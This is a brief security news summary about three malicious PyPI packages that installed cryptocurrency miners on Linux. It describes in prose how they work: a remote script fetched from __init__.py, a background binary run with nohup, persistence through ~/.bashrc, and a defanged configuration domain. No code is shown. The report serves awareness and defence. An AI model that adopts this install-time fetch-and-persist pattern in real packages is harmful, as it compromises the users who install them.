Beware: 3 Malicious PyPI Packages Found Targeting Linux with Crypto Miners>
The Hacker News –
Three malicious packages—modularseven, driftme, and catme—were discovered in the Python Package Index (PyPI) repository, garnering a total of 431 downloads in the last month before being removed.
These packages deploy a CoinMiner executable on Linux devices.
The code, embedded in the __init__.py file, fetches a shell script from a remote server, initiating the mining activity with a configuration file and the CoinMiner hosted on GitLab.
The ELF binary file is executed in the background using the nohup command to ensure continuous operation even after the user exits the session.
These packages conceal their payload on a remote URL, echoing the method used by the culturestreak package.
Notably, the configuration file is hosted on the domain papiculo[.]net, and the coin mining executables are hosted on a public GitLab repository.
Furthermore, the malicious behavior is concealed in a shell script, enhancing evasion of security software and prolonging the exploitation process.
Additionally, the malware ensures persistence and reactivation on the user’s device by inserting malicious commands into the ~/.bashrc file, enabling prolonged covert operations for the attacker’s benefit.
Link: https://thehackernews.com/2024/01/beware-3-malicious-pypi-packages-found.html